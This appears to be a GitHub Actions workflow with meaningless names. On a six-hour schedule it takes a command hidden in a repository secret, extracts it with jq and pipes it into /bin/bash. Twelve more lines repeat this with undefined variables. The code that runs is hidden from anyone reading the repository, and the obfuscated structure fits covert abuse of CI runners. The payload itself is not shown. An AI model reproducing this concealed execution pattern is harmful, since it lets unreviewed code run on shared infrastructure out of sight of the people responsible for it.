name: dadanmaxo
on:
  workflow_dispatch:
  schedule:
    - cron: '22 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dadanmaxo
        env:
          aqir2364: ${{ secrets.aqir2364 }}
        run: |
          echo $aqir2364 | jq -r .it21 | /bin/bash
          echo $jxja6 | jq -r .vik57094 | /bin/bash
          echo $otqqi46 | jq -r .zi76 | /bin/bash
          echo $t73 | jq -r .neo908 | /bin/bash
          echo $uh6 | jq -r .st7 | /bin/bash
          echo $th11 | jq -r .wedi902 | /bin/bash
          echo $ukm17206 | jq -r .xd144 | /bin/bash
          echo $yp93439 | jq -r .x25738 | /bin/bash
          echo $u70 | jq -r .r6648 | /bin/bash
          echo $tpzgf22460 | jq -r .ne15349 | /bin/bash
          echo $ven7 | jq -r .h1479 | /bin/bash
          echo $kpgy35 | jq -r .zelt137 | /bin/bash
          echo $jp12614 | jq -r .itfpc8009 | /bin/bash

